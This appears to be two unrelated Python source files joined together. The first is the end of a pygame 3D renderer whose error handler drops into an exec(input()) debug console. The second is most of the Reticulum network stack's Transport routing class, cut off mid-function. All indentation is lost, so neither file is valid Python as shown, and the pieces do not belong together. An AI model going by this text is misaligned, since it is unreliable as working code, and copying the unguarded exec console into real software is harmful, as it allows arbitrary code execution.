camera[0] -= 2 * math.cos((camera_facing[0]) * math.pi/180) * dt / 50
if keys[pygame.K_s]:
camera[2] -= 2 * math.sin((camera_facing[0] + c) * math.pi/180) * dt / 50
camera[0] -= 2 * math.cos((camera_facing[0] + c) * math.pi/180) * dt / 50
if keys[pygame.K_d]:
camera[2] += 2 * math.sin((camera_facing[0]) * math.pi/180) * dt / 50
camera[0] += 2 * math.cos((camera_facing[0]) * math.pi/180) * dt / 50
if keys[pygame.K_LSHIFT]:
camera[1] += 2 * dt / 50
if keys[pygame.K_SPACE]:
camera[1] -= 2 * dt / 50
if settings['updown']:
if keys[pygame.K_UP]:
camera_facing[1] += 2 * dt / 50
if keys[pygame.K_DOWN]:
camera_facing[1] -= 2 * dt / 50
if keys[pygame.K_LEFT]:
camera_facing[0] += 2 * dt / 50
if keys[pygame.K_RIGHT]:
camera_facing[0] -= 2 * dt / 50
screen.fill(black)
if not menu:
for id in objects.keys():
if objects[id][0] == 'cube':
if objects[id][1] != get_calculate_hash() or objects[id][4]:
objects[id][1] = get_calculate_hash()
if objects[id][4]:
exec(objects[id][5])
objects[id][3] = calculate_cube(objects[id][2][0],objects[id][2][1],objects[id][2][2],objects[id][2][3],objects[id][2][4],objects[id][2][5],objects[id][2][6],objects[id][2][7],objects[id][2][8])
process_all_points(objects[id][3])
if objects[id][0] == 'sphere':
if objects[id][1] != get_calculate_hash() or objects[id][4]:
objects[id][1] = get_calculate_hash()
if objects[id][4]:
exec(objects[id][5])
objects[id][3] = calculate_sphere(objects[id][2][0],objects[id][2][1],objects[id][2][2],objects[id][2][3],objects[id][2][4],objects[id][2][5],objects[id][2][6])
process_all_points(objects[id][3])
else:
if settings['updown']:
udoption = myfont.render('Updown camera rotation', False, yes)
else:
udoption = myfont.render('Updown camera rotation', False, no)
screen.blit(menu_img,(0,0))
screen.blit(udoption,(10,10))
b1,b2,b3 = pygame.mouse.get_pressed()
if b1 == 1:
if pygame.Rect(2,2,198,58).collidepoint(pygame.mouse.get_pos()):
settings['updown'] = not settings['updown']
camera_facing[1] = 0
menu = False
screen.blit(textsurface,(0,0))
pygame.display.flip()
try:
main()
except Exception as e:
print(str(e))
print('starting debug console')
while True:
exec(input('>>>'))
|
Transport.py
|
import os
import RNS
import time
import math
import struct
import threading
import traceback
from time import sleep
from .vendor import umsgpack as umsgpack
class Transport:
"""
Through static methods of this class you can interact with Reticulums
Transport system.
"""
# Constants
BROADCAST = 0x00;
TRANSPORT = 0x01;
RELAY = 0x02;
TUNNEL = 0x03;
types = [BROADCAST, TRANSPORT, RELAY, TUNNEL]
REACHABILITY_UNREACHABLE = 0x00
REACHABILITY_DIRECT = 0x01
REACHABILITY_TRANSPORT = 0x02
APP_NAME = "rnstransport"
PATHFINDER_M = 128 # Max hops
"""
Maximum amount of hops that Reticulum will transport a packet.
"""
PATHFINDER_C = 2.0 # Decay constant
PATHFINDER_R = 1 # Retransmit retries
PATHFINDER_T = 10 # Retry grace period
PATHFINDER_RW = 10 # Random window for announce rebroadcast
PATHFINDER_E = 60*15 # Path expiration in seconds
# TODO: Calculate an optimal number for this in
# various situations
LOCAL_REBROADCASTS_MAX = 2 # How many local rebroadcasts of an announce is allowed
PATH_REQUEST_GRACE = 0.35 # Grace time before a path announcement is made, allows directly reachable peers to respond first
PATH_REQUEST_RW = 2 # Path request random window
LINK_TIMEOUT = RNS.Link.KEEPALIVE * 2
REVERSE_TIMEOUT = 30*60 # Reverse table entries are removed after max 30 minutes
DESTINATION_TIMEOUT = 60*60*24*7 # Destination table entries are removed if unused for one week
MAX_RECEIPTS = 1024 # Maximum number of receipts to keep track of
interfaces = [] # All active interfaces
destinations = [] # All active destinations
pending_links = [] # Links that are being established
active_links = [] # Links that are active
packet_hashlist = [] # A list of packet hashes for duplicate detection
receipts = [] # Receipts of all outgoing packets for proof processing
# TODO: "destination_table" should really be renamed to "path_table"
# Notes on memory usage: 1 megabyte of memory can store approximately
# 55.100 path table entries or approximately 22.300 link table entries.
announce_table = {} # A table for storing announces currently waiting to be retransmitted
destination_table = {} # A lookup table containing the next hop to a given destination
reverse_table = {} # A lookup table for storing packet hashes used to return proofs and replies
link_table = {} # A lookup table containing hops for links
held_announces = {} # A table containing temporarily held announce-table entries
announce_handlers = [] # A table storing externally registered announce handlers
# Transport control destinations are used
# for control purposes like path requests
control_destinations = []
control_hashes = []
# Interfaces for communicating with
# local clients connected to a shared
# Reticulum instance
local_client_interfaces = []
jobs_locked = False
jobs_running = False
job_interval = 0.250
receipts_last_checked = 0.0
receipts_check_interval = 1.0
announces_last_checked = 0.0
announces_check_interval = 1.0
hashlist_maxsize = 1000000
tables_last_culled = 0.0
tables_cull_interval = 5.0
identity = None
@staticmethod
def start(reticulum_instance):
Transport.owner = reticulum_instance
if Transport.identity == None:
transport_identity_path = RNS.Reticulum.storagepath+"/transport_identity"
if os.path.isfile(transport_identity_path):
Transport.identity = RNS.Identity.from_file(transport_identity_path)
if Transport.identity == None:
RNS.log("No valid Transport Identity in storage, creating...", RNS.LOG_VERBOSE)
Transport.identity = RNS.Identity()
Transport.identity.to_file(transport_identity_path)
else:
RNS.log("Loaded Transport Identity from storage", RNS.LOG_VERBOSE)
packet_hashlist_path = RNS.Reticulum.storagepath+"/packet_hashlist"
if os.path.isfile(packet_hashlist_path):
try:
file = open(packet_hashlist_path, "rb")
Transport.packet_hashlist = umsgpack.unpackb(file.read())
file.close()
except Exception as e:
RNS.log("Could not load packet hashlist from storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
# Create transport-specific destinations
Transport.path_request_destination = RNS.Destination(None, RNS.Destination.IN, RNS.Destination.PLAIN, Transport.APP_NAME, "path", "request")
Transport.path_request_destination.set_packet_callback(Transport.path_request_handler)
Transport.control_destinations.append(Transport.path_request_destination)
Transport.control_hashes.append(Transport.path_request_destination.hash)
thread = threading.Thread(target=Transport.jobloop)
thread.setDaemon(True)
thread.start()
if RNS.Reticulum.transport_enabled():
destination_table_path = RNS.Reticulum.storagepath+"/destination_table"
if os.path.isfile(destination_table_path) and not Transport.owner.is_connected_to_shared_instance:
serialised_destinations = []
try:
file = open(destination_table_path, "rb")
serialised_destinations = umsgpack.unpackb(file.read())
file.close()
for serialised_entry in serialised_destinations:
destination_hash = serialised_entry[0]
timestamp = serialised_entry[1]
received_from = serialised_entry[2]
hops = serialised_entry[3]
expires = serialised_entry[4]
random_blobs = serialised_entry[5]
receiving_interface = Transport.find_interface_from_hash(serialised_entry[6])
announce_packet = Transport.get_cached_packet(serialised_entry[7])
if announce_packet != None and receiving_interface != None:
announce_packet.unpack()
# We increase the hops, since reading a packet
# from cache is equivalent to receiving it again
# over an interface. It is cached with it's non-
# increased hop-count.
announce_packet.hops += 1
Transport.destination_table[destination_hash] = [timestamp, received_from, hops, expires, random_blobs, receiving_interface, announce_packet]
RNS.log("Loaded path table entry for "+RNS.prettyhexrep(destination_hash)+" from storage", RNS.LOG_DEBUG)
else:
RNS.log("Could not reconstruct path table entry from storage for "+RNS.prettyhexrep(destination_hash), RNS.LOG_DEBUG)
if announce_packet == None:
RNS.log("The announce packet could not be loaded from cache", RNS.LOG_DEBUG)
if receiving_interface == None:
RNS.log("The interface is no longer available", RNS.LOG_DEBUG)
if len(Transport.destination_table) == 1:
specifier = "entry"
else:
specifier = "entries"
RNS.log("Loaded "+str(len(Transport.destination_table))+" path table "+specifier+" from storage", RNS.LOG_VERBOSE)
except Exception as e:
RNS.log("Could not load destination table from storage, the contained exception was: "+str(e), RNS.LOG_ERROR)
RNS.log("Transport instance "+str(Transport.identity)+" started")
@staticmethod
def jobloop():
while (True):
Transport.jobs()
sleep(Transport.job_interval)
@staticmethod
def jobs():
outgoing = []
Transport.jobs_running = True
try:
if not Transport.jobs_locked:
# Process receipts list for timed-out packets
if time.time() > Transport.receipts_last_checked+Transport.receipts_check_interval:
while len(Transport.receipts) > Transport.MAX_RECEIPTS:
culled_receipt = Transport.receipts.pop(0)
culled_receipt.timeout = -1
culled_receipt.check_timeout()
for receipt in Transport.receipts:
receipt.check_timeout()
if receipt.status != RNS.PacketReceipt.SENT:
Transport.receipts.remove(receipt)
Transport.receipts_last_checked = time.time()
# Process announces needing retransmission
if time.time() > Transport.announces_last_checked+Transport.announces_check_interval:
for destination_hash in Transport.announce_table:
announce_entry = Transport.announce_table[destination_hash]
if announce_entry[2] > Transport.PATHFINDER_R:
RNS.log("Dropping announce for "+RNS.prettyhexrep(destination_hash)+", retries exceeded", RNS.LOG_DEBUG)
Transport.announce_table.pop(destination_hash)
break
else:
if time.time() > announce_entry[1]:
announce_entry[1] = time.time() + math.pow(Transport.PATHFINDER_C, announce_entry[4]) + Transport.PATHFINDER_T + Transport.PATHFINDER_RW
announce_entry[2] += 1
packet = announce_entry[5]
block_rebroadcasts = announce_entry[7]
attached_interface = announce_entry[8]
announce_context = RNS.Packet.NONE
if block_rebroadcasts:
announce_context = RNS.Packet.PATH_RESPONSE
announce_data = packet.data
announce_identity = RNS.Identity.recall(packet.destination_hash)
announce_destination = RNS.Destination(announce_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, "unknown", "unknown");
announce_destination.hash = packet.destination_hash
announce_destination.hexhash = announce_destination.hash.hex()
new_packet = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = attached_interface
)
new_packet.hops = announce_entry[4]
if block_rebroadcasts:
RNS.log("Rebroadcasting announce as path response for "+RNS.prettyhexrep(announce_destination.hash)+" with hop count "+str(new_packet.hops), RNS.LOG_DEBUG)
else:
RNS.log("Rebroadcasting announce for "+RNS.prettyhexrep(announce_destination.hash)+" with hop count "+str(new_packet.hops), RNS.LOG_DEBUG)
outgoing.append(new_packet)
# This handles an edge case where a peer sends a past
# request for a destination just after an announce for
# said destination has arrived, but before it has been
# rebroadcast locally. In such a case the actual announce
# is temporarily held, and then reinserted when the path
# request has been served to the peer.
if destination_hash in Transport.held_announces:
held_entry = Transport.held_announces.pop(destination_hash)
Transport.announce_table[destination_hash] = held_entry
RNS.log("Reinserting held announce into table", RNS.LOG_DEBUG)
Transport.announces_last_checked = time.time()
# Cull the packet hashlist if it has reached max size
if len(Transport.packet_hashlist) > Transport.hashlist_maxsize:
Transport.packet_hashlist = Transport.packet_hashlist[len(Transport.packet_hashlist)-Transport.hashlist_maxsize:len(Transport.packet_hashlist)-1]
if time.time() > Transport.tables_last_culled + Transport.tables_cull_interval:
# Cull the reverse table according to timeout
for truncated_packet_hash in Transport.reverse_table:
reverse_entry = Transport.reverse_table[truncated_packet_hash]
if time.time() > reverse_entry[2] + Transport.REVERSE_TIMEOUT:
Transport.reverse_table.pop(truncated_packet_hash)
# Cull the link table according to timeout
stale_links = []
for link_id in Transport.link_table:
link_entry = Transport.link_table[link_id]
if time.time() > link_entry[0] + Transport.LINK_TIMEOUT:
stale_links.append(link_id)
# Cull the path table
stale_paths = []
for destination_hash in Transport.destination_table:
destination_entry = Transport.destination_table[destination_hash]
attached_interface = destination_entry[5]
if time.time() > destination_entry[0] + Transport.DESTINATION_TIMEOUT:
stale_paths.append(destination_hash)
RNS.log("Path to "+RNS.prettyhexrep(destination_hash)+" timed out and was removed", RNS.LOG_DEBUG)
if not attached_interface in Transport.interfaces:
stale_paths.append(destination_hash)
RNS.log("Path to "+RNS.prettyhexrep(destination_hash)+" was removed since the attached interface no longer exists", RNS.LOG_DEBUG)
i = 0
for link_id in stale_links:
Transport.link_table.pop(link_id)
i += 1
if i > 0:
if i == 1:
RNS.log("Dropped "+str(i)+" link", RNS.LOG_DEBUG)
else:
RNS.log("Dropped "+str(i)+" links", RNS.LOG_DEBUG)
i = 0
for destination_hash in stale_paths:
Transport.destination_table.pop(destination_hash)
i += 1
if i > 0:
if i == 1:
RNS.log("Removed "+str(i)+" path", RNS.LOG_DEBUG)
else:
RNS.log("Removed "+str(i)+" paths", RNS.LOG_DEBUG)
Transport.tables_last_culled = time.time()
except Exception as e:
RNS.log("An exception occurred while running Transport jobs.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
traceback.print_exc()
Transport.jobs_running = False
for packet in outgoing:
packet.send()
@staticmethod
def outbound(packet):
while (Transport.jobs_running):
sleep(0.01)
Transport.jobs_locked = True
# TODO: This updateHash call might be redundant
packet.update_hash()
sent = False
# Check if we have a known path for the destination in the path table
if packet.packet_type != RNS.Packet.ANNOUNCE and packet.destination_hash in Transport.destination_table:
outbound_interface = Transport.destination_table[packet.destination_hash][5]
# If there's more than one hop to the destination, and we know
# a path, we insert the packet into transport by adding the next
# transport nodes address to the header, and modifying the flags.
# This rule applies both for "normal" transport, and when connected
# to a local shared Reticulum instance.
if Transport.destination_table[packet.destination_hash][2] > 1:
if packet.header_type == RNS.Packet.HEADER_1:
# Insert packet into transport
new_flags = (RNS.Packet.HEADER_2) << 6 | (Transport.TRANSPORT) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += packet.raw[1:2]
new_raw += Transport.destination_table[packet.destination_hash][1]
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
sent = True
# In the special case where we are connected to a local shared
# Reticulum instance, and the destination is one hop away, we
# also add transport headers to inject the packet into transport
# via the shared instance. Normally a packet for a destination
# one hop away would just be broadcast directly, but since we
# are "behind" a shared instance, we need to get that instance
# to transport it onto the network.
elif Transport.destination_table[packet.destination_hash][2] == 1 and Transport.owner.is_connected_to_shared_instance:
if packet.header_type == RNS.Packet.HEADER_1:
# Insert packet into transport
new_flags = (RNS.Packet.HEADER_2) << 6 | (Transport.TRANSPORT) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += packet.raw[1:2]
new_raw += Transport.destination_table[packet.destination_hash][1]
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
sent = True
# If none of the above applies, we know the destination is
# directly reachable, and also on which interface, so we
# simply transmit the packet directly on that one.
else:
outbound_interface.processOutgoing(packet.raw)
sent = True
# If we don't have a known path for the destination, we'll
# broadcast the packet on all outgoing interfaces, or the
# just the relevant interface if the packet has an attached
# interface, or belongs to a link.
else:
stored_hash = False
for interface in Transport.interfaces:
if interface.OUT:
should_transmit = True
if packet.destination.type == RNS.Destination.LINK:
if packet.destination.status == RNS.Link.CLOSED:
should_transmit = False
if interface != packet.destination.attached_interface:
should_transmit = False
if packet.attached_interface != None and interface != packet.attached_interface:
should_transmit = False
if should_transmit:
if not stored_hash:
Transport.packet_hashlist.append(packet.packet_hash)
interface.processOutgoing(packet.raw)
sent = True
if sent:
packet.sent = True
packet.sent_at = time.time()
# Don't generate receipt if it has been explicitly disabled
if (packet.create_receipt == True and
# Only generate receipts for DATA packets
packet.packet_type == RNS.Packet.DATA and
# Don't generate receipts for PLAIN destinations
packet.destination.type != RNS.Destination.PLAIN and
# Don't generate receipts for link-related packets
not (packet.context >= RNS.Packet.KEEPALIVE and packet.context <= RNS.Packet.LRPROOF) and
# Don't generate receipts for resource packets
not (packet.context >= RNS.Packet.RESOURCE and packet.context <= RNS.Packet.RESOURCE_RCL)):
packet.receipt = RNS.PacketReceipt(packet)
Transport.receipts.append(packet.receipt)
Transport.cache(packet)
Transport.jobs_locked = False
return sent
@staticmethod
def packet_filter(packet):
# TODO: Think long and hard about this.
# Is it even strictly necessary with the current
# transport rules?
if packet.context == RNS.Packet.KEEPALIVE:
return True
if packet.context == RNS.Packet.RESOURCE_REQ:
return True
if packet.context == RNS.Packet.RESOURCE_PRF:
return True
if packet.context == RNS.Packet.RESOURCE:
return True
if packet.context == RNS.Packet.CACHE_REQUEST:
return True
if packet.destination_type == RNS.Destination.PLAIN:
return True
if not packet.packet_hash in Transport.packet_hashlist:
return True
else:
if packet.packet_type == RNS.Packet.ANNOUNCE:
return True
RNS.log("Filtered packet with hash "+RNS.prettyhexrep(packet.packet_hash), RNS.LOG_DEBUG)
return False
@staticmethod
def inbound(raw, interface=None):
while (Transport.jobs_running):
sleep(0.01)
Transport.jobs_locked = True
packet = RNS.Packet(None, raw)
packet.unpack()
packet.receiving_interface = interface
packet.hops += 1
if len(Transport.local_client_interfaces) > 0:
if Transport.is_local_client_interface(interface):
packet.hops -= 1
elif Transport.interface_to_shared_instance(interface):
packet.hops -= 1
if Transport.packet_filter(packet):
Transport.packet_hashlist.append(packet.packet_hash)
Transport.cache(packet)
# Check special conditions for local clients connected
# through a shared Reticulum instance
from_local_client = (packet.receiving_interface in Transport.local_client_interfaces)
for_local_client = (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.destination_table and Transport.destination_table[packet.destination_hash][2] == 0)
for_local_client_link = (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.link_table and Transport.link_table[packet.destination_hash][4] in Transport.local_client_interfaces)
for_local_client_link |= (packet.packet_type != RNS.Packet.ANNOUNCE) and (packet.destination_hash in Transport.link_table and Transport.link_table[packet.destination_hash][2] in Transport.local_client_interfaces)
proof_for_local_client = (packet.destination_hash in Transport.reverse_table) and (Transport.reverse_table[packet.destination_hash][0] in Transport.local_client_interfaces)
# Plain broadcast packets from local clients are sent
# directly on all attached interfaces, since they are
# never injected into transport.
if not packet.destination_hash in Transport.control_hashes:
if packet.destination_type == RNS.Destination.PLAIN and packet.transport_type == Transport.BROADCAST:
# Send to all interfaces except the originator
if from_local_client:
for interface in Transport.interfaces:
if interface != packet.receiving_interface:
interface.processOutgoing(packet.raw)
# If the packet was not from a local client, send
# it directly to all local clients
else:
for interface in Transport.local_client_interfaces:
interface.processOutgoing(packet.raw)
# General transport handling. Takes care of directing
# packets according to transport tables and recording
# entries in reverse and link tables.
if RNS.Reticulum.transport_enabled() or from_local_client or for_local_client or for_local_client_link:
# If there is no transport id, but the packet is
# for a local client, we generate the transport
# id (it was stripped on the previous hop, since
# we "spoof" the hop count for clients behind a
# shared instance, so they look directly reach-
# able), and reinsert, so the normal transport
# implementation can handle the packet.
if packet.transport_id == None and for_local_client:
packet.transport_id = Transport.identity.hash
# If this is a cache request, and we can fullfill
# it, do so and stop processing. Otherwise resume
# normal processing.
if packet.context == RNS.Packet.CACHE_REQUEST:
if Transport.cache_request_packet(packet):
return
# If the packet is in transport, check whether we
# are the designated next hop, and process it
# accordingly if we are.
if packet.transport_id != None and packet.packet_type != RNS.Packet.ANNOUNCE:
if packet.transport_id == Transport.identity.hash:
if packet.destination_hash in Transport.destination_table:
next_hop = Transport.destination_table[packet.destination_hash][1]
remaining_hops = Transport.destination_table[packet.destination_hash][2]
if remaining_hops > 1:
# Just increase hop count and transmit
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += next_hop
new_raw += packet.raw[12:]
elif remaining_hops == 1:
# Strip transport headers and transmit
new_flags = (RNS.Packet.HEADER_1) << 6 | (Transport.BROADCAST) << 4 | (packet.flags & 0b00001111)
new_raw = struct.pack("!B", new_flags)
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[12:]
elif remaining_hops == 0:
# Just increase hop count and transmit
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
outbound_interface = Transport.destination_table[packet.destination_hash][5]
outbound_interface.processOutgoing(new_raw)
Transport.destination_table[packet.destination_hash][0] = time.time()
if packet.packet_type == RNS.Packet.LINKREQUEST:
# Entry format is
link_entry = [ time.time(), # 0: Timestamp,
next_hop, # 1: Next-hop transport ID
outbound_interface, # 2: Next-hop interface
remaining_hops, # 3: Remaining hops
packet.receiving_interface, # 4: Received on interface
packet.hops, # 5: Taken hops
packet.destination_hash, # 6: Original destination hash
False] # 7: Validated
Transport.link_table[packet.getTruncatedHash()] = link_entry
else:
# Entry format is
reverse_entry = [ packet.receiving_interface, # 0: Received on interface
outbound_interface, # 1: Outbound interface
time.time()] # 2: Timestamp
Transport.reverse_table[packet.getTruncatedHash()] = reverse_entry
else:
# TODO: There should probably be some kind of REJECT
# mechanism here, to signal to the source that their
# expected path failed.
RNS.log("Got packet in transport, but no known path to final destination. Dropping packet.", RNS.LOG_DEBUG)
# Link transport handling. Directs packets according
# to entries in the link tables
if packet.packet_type != RNS.Packet.ANNOUNCE and packet.packet_type != RNS.Packet.LINKREQUEST and packet.context != RNS.Packet.LRPROOF:
if packet.destination_hash in Transport.link_table:
link_entry = Transport.link_table[packet.destination_hash]
# If receiving and outbound interface is
# the same for this link, direction doesn't
# matter, and we simply send the packet on.
outbound_interface = None
if link_entry[2] == link_entry[4]:
# But check that taken hops matches one
# of the expectede values.
if packet.hops == link_entry[3] or packet.hops == link_entry[5]:
outbound_interface = link_entry[2]
else:
# If interfaces differ, we transmit on
# the opposite interface of what the
# packet was received on.
if packet.receiving_interface == link_entry[2]:
# Also check that expected hop count matches
if packet.hops == link_entry[3]:
outbound_interface = link_entry[4]
elif packet.receiving_interface == link_entry[4]:
# Also check that expected hop count matches
if packet.hops == link_entry[5]:
outbound_interface = link_entry[2]
if outbound_interface != None:
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
outbound_interface.processOutgoing(new_raw)
Transport.link_table[packet.destination_hash][0] = time.time()
else:
pass
# Announce handling. Handles logic related to incoming
# announces, queueing rebroadcasts of these, and removal
# of queued announce rebroadcasts once handed to the next node.
if packet.packet_type == RNS.Packet.ANNOUNCE:
local_destination = next((d for d in Transport.destinations if d.hash == packet.destination_hash), None)
if local_destination == None and RNS.Identity.validate_announce(packet):
if packet.transport_id != None:
received_from = packet.transport_id
# Check if this is a next retransmission from
# another node. If it is, we're removing the
# announce in question from our pending table
if RNS.Reticulum.transport_enabled() and packet.destination_hash in Transport.announce_table:
announce_entry = Transport.announce_table[packet.destination_hash]
if packet.hops-1 == announce_entry[4]:
RNS.log("Heard a local rebroadcast of announce for "+RNS.prettyhexrep(packet.destination_hash), RNS.LOG_DEBUG)
announce_entry[6] += 1
if announce_entry[6] >= Transport.LOCAL_REBROADCASTS_MAX:
RNS.log("Max local rebroadcasts of announce for "+RNS.prettyhexrep(packet.destination_hash)+" reached, dropping announce from our table", RNS.LOG_DEBUG)
Transport.announce_table.pop(packet.destination_hash)
if packet.hops-1 == announce_entry[4]+1 and announce_entry[2] > 0:
now = time.time()
if now < announce_entry[1]:
RNS.log("Rebroadcasted announce for "+RNS.prettyhexrep(packet.destination_hash)+" has been passed on to next node, no further tries needed", RNS.LOG_DEBUG)
Transport.announce_table.pop(packet.destination_hash)
else:
received_from = packet.destination_hash
# Check if this announce should be inserted into
# announce and destination tables
should_add = False
# First, check that the announce is not for a destination
# local to this system, and that hops are less than the max
if (not any(packet.destination_hash == d.hash for d in Transport.destinations) and packet.hops < Transport.PATHFINDER_M+1):
random_blob = packet.data[RNS.Identity.KEYSIZE//8+10:RNS.Identity.KEYSIZE//8+20]
random_blobs = []
if packet.destination_hash in Transport.destination_table:
random_blobs = Transport.destination_table[packet.destination_hash][4]
# If we already have a path to the announced
# destination, but the hop count is equal or
# less, we'll update our tables.
if packet.hops <= Transport.destination_table[packet.destination_hash][2]:
# Make sure we haven't heard the random
# blob before, so announces can't be
# replayed to forge paths.
# TODO: Check whether this approach works
# under all circumstances
if not random_blob in random_blobs:
should_add = True
else:
should_add = False
else:
# If an announce arrives with a larger hop
# count than we already have in the table,
# ignore it, unless the path is expired
if (time.time() > Transport.destination_table[packet.destination_hash][3]):
# We also check that the announce hash is
# different from ones we've already heard,
# to avoid loops in the network
if not random_blob in random_blobs:
# TODO: Check that this ^ approach actually
# works under all circumstances
RNS.log("Replacing destination table entry for "+str(RNS.prettyhexrep(packet.destination_hash))+" with new announce due to expired path", RNS.LOG_DEBUG)
should_add = True
else:
should_add = False
else:
should_add = False
else:
# If this destination is unknown in our table
# we should add it
should_add = True
if should_add:
now = time.time()
retries = 0
expires = now + Transport.PATHFINDER_E
announce_hops = packet.hops
local_rebroadcasts = 0
block_rebroadcasts = False
attached_interface = None
retransmit_timeout = now + math.pow(Transport.PATHFINDER_C, packet.hops) + (RNS.rand() * Transport.PATHFINDER_RW)
random_blobs.append(random_blob)
if (RNS.Reticulum.transport_enabled() or Transport.from_local_client(packet)) and packet.context != RNS.Packet.PATH_RESPONSE:
# If the announce is from a local client,
# we announce it immediately, but only one
# time.
if Transport.from_local_client(packet):
retransmit_timeout = now
retries = Transport.PATHFINDER_R
Transport.announce_table[packet.destination_hash] = [
now,
retransmit_timeout,
retries,
received_from,
announce_hops,
packet,
local_rebroadcasts,
block_rebroadcasts,
attached_interface
]
# If we have any local clients connected, we re-
# transmit the announce to them immediately
if (len(Transport.local_client_interfaces)):
announce_identity = RNS.Identity.recall(packet.destination_hash)
announce_destination = RNS.Destination(announce_identity, RNS.Destination.OUT, RNS.Destination.SINGLE, "unknown", "unknown");
announce_destination.hash = packet.destination_hash
announce_destination.hexhash = announce_destination.hash.hex()
announce_context = RNS.Packet.NONE
announce_data = packet.data
if Transport.from_local_client(packet) and packet.context == RNS.Packet.PATH_RESPONSE:
for interface in Transport.interfaces:
if packet.receiving_interface != interface:
new_announce = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = interface
)
new_announce.hops = packet.hops
new_announce.send()
else:
for local_interface in Transport.local_client_interfaces:
new_announce = RNS.Packet(
announce_destination,
announce_data,
RNS.Packet.ANNOUNCE,
context = announce_context,
header_type = RNS.Packet.HEADER_2,
transport_type = Transport.TRANSPORT,
transport_id = Transport.identity.hash,
attached_interface = local_interface
)
new_announce.hops = packet.hops
new_announce.send()
Transport.destination_table[packet.destination_hash] = [now, received_from, announce_hops, expires, random_blobs, packet.receiving_interface, packet]
RNS.log("Path to "+RNS.prettyhexrep(packet.destination_hash)+" is now "+str(announce_hops)+" hops away via "+RNS.prettyhexrep(received_from)+" on "+str(packet.receiving_interface), RNS.LOG_VERBOSE)
# Call externally registered callbacks from apps
# wanting to know when an announce arrives
for handler in Transport.announce_handlers:
try:
# Check that the announced destination matches
# the handlers aspect filter
execute_callback = False
if handler.aspect_filter == None:
# If the handlers aspect filter is set to
# None, we execute the callback in all cases
execute_callback = True
else:
announce_identity = RNS.Identity.recall(packet.destination_hash)
handler_expected_hash = RNS.Destination.hash_from_name_and_identity(handler.aspect_filter, announce_identity)
if packet.destination_hash == handler_expected_hash:
execute_callback = True
if execute_callback:
handler.received_announce(
destination_hash=packet.destination_hash,
announced_identity=announce_identity,
app_data=RNS.Identity.recall_app_data(packet.destination_hash)
)
except Exception as e:
RNS.log("Error while processing external announce callback.", RNS.LOG_ERROR)
RNS.log("The contained exception was: "+str(e), RNS.LOG_ERROR)
# Handling for linkrequests to local destinations
elif packet.packet_type == RNS.Packet.LINKREQUEST:
for destination in Transport.destinations:
if destination.hash == packet.destination_hash and destination.type == packet.destination_type:
packet.destination = destination
destination.receive(packet)
# Handling for local data packets
elif packet.packet_type == RNS.Packet.DATA:
if packet.destination_type == RNS.Destination.LINK:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
packet.link = link
link.receive(packet)
else:
for destination in Transport.destinations:
if destination.hash == packet.destination_hash and destination.type == packet.destination_type:
packet.destination = destination
destination.receive(packet)
if destination.proof_strategy == RNS.Destination.PROVE_ALL:
packet.prove()
elif destination.proof_strategy == RNS.Destination.PROVE_APP:
if destination.callbacks.proof_requested:
if destination.callbacks.proof_requested(packet):
packet.prove()
# Handling for proofs and link-request proofs
elif packet.packet_type == RNS.Packet.PROOF:
if packet.context == RNS.Packet.LRPROOF:
# This is a link request proof, check if it
# needs to be transported
if (RNS.Reticulum.transport_enabled() or for_local_client_link or from_local_client) and packet.destination_hash in Transport.link_table:
link_entry = Transport.link_table[packet.destination_hash]
if packet.receiving_interface == link_entry[2]:
# TODO: Should we validate the LR proof at each transport
# step before transporting it?
RNS.log("Link request proof received on correct interface, transporting it via "+str(link_entry[4]), RNS.LOG_DEBUG)
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
Transport.link_table[packet.destination_hash][7] = True
link_entry[4].processOutgoing(new_raw)
else:
RNS.log("Link request proof received on wrong interface, not transporting it.", RNS.LOG_DEBUG)
else:
# Check if we can deliver it to a local
# pending link
for link in Transport.pending_links:
if link.link_id == packet.destination_hash:
link.validate_proof(packet)
elif packet.context == RNS.Packet.RESOURCE_PRF:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
link.receive(packet)
else:
if packet.destination_type == RNS.Destination.LINK:
for link in Transport.active_links:
if link.link_id == packet.destination_hash:
packet.link = link
if len(packet.data) == RNS.PacketReceipt.EXPL_LENGTH:
proof_hash = packet.data[:RNS.Identity.HASHLENGTH//8]
else:
proof_hash = None
# Check if this proof neds to be transported
if (RNS.Reticulum.transport_enabled() or from_local_client or proof_for_local_client) and packet.destination_hash in Transport.reverse_table:
reverse_entry = Transport.reverse_table.pop(packet.destination_hash)
if packet.receiving_interface == reverse_entry[1]:
RNS.log("Proof received on correct interface, transporting it via "+str(reverse_entry[0]), RNS.LOG_DEBUG)
new_raw = packet.raw[0:1]
new_raw += struct.pack("!B", packet.hops)
new_raw += packet.raw[2:]
reverse_entry[0].processOutgoing(new_raw)
else:
RNS.log("Proof received on wrong interface, not transporting it.", RNS.LOG_DEBUG)
for receipt in Transport.receipts:
receipt_validated = False
if proof_hash != None:
# Only test validation if hash matches
if receipt.hash == proof_hash:
